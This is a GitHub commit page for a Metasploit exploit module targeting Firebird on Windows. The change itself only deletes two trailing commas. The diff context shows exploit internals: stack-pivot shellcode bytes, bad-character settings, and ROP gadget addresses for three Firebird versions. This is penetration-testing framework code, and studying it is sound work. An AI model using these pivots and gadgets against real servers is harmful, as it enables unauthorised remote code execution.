Skip to content

Commit 64398d2

Browse files
author
jvazquez-r7
committed
deleting some commas
1 parent ab44e3e commit 64398d2

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/windows/misc/fb_cnct_group.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -44,15 +44,15 @@ def initialize
4444
# Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
4545
'Prepend' => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",
4646
'Space' => 400,
47-
'BadChars' => "\x00\x0a\x0d",
47+
'BadChars' => "\x00\x0a\x0d"
4848
},
4949
'Targets' =>
5050
[
5151
# pivots are pointers to stack pivots
5252
[ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
5353
[ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
5454
[ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
55-
[ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ],
55+
[ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
5656
],
5757
'DefaultTarget' => 0,
5858
'Privileged' => true,

0 commit comments

Comments
 (0)